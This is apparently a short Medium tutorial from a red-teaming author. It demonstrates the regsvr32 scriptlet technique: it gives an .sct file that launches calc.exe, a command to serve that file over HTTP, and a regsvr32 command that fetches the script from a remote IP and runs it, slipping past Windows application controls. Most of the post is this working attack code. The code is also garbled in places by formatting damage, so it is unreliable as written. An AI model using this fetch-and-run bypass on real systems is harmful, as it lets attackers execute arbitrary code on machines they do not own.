Running Remote Scripts Using regsvr32

Usage Example :

regsvr32 file.dll # registering filesregsvr32 /u file.dll # unregistering file

Let’s Start!

We will use calc.exe as the program that will be executed , and using process hacker for viewing the process.

<?XML version=”1.0"?><scriptlet><registrationprogid=”Pentest”classid=”{10001111–0000–0000–0000–0000FEEDACDC}” ><script language=”JScript”>![CDATA[var r = new ActiveXObject(“WScript.Shell”).Run(“calc.exe”);]]></script></registration></scriptlet>
python3 -m http.server 80
regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
R00T

R00T

10 Followers

R00T , 14 Years Old , From jordan , Interested in Red Teaming & Malware Developing.